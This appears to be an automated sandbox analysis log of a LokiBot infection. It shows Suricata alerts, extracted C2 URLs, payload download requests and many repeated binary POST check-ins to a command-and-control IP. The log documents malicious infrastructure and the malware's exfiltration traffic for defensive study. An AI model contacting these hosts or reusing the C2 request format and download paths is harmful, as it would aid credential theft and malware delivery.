                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49915 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49947 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50037
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49915 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49901
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50031
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50051
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50036
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49947
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50045
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50006 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50006 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49885
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49915
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50057
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50006
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49920 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49920 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50048
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49920 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50046
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50055
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49920 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50023 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49920 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50023 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50023 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50052 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50047
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49920
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50052 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50023 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50023 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50023
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50052 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49971
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50052
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50034 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50034
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49984 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49984 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49984 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50039
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49984 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49984 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49984
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50050
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50025 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50025
                Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.243.136:80 -> 192.168.2.5:49748
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.5:49705
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.95/simple/five/fre.php
                Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /32/SMPLLS.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: GET /32/seemybestthingswithentirelifetimethingstodomybest.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 153Connection: close
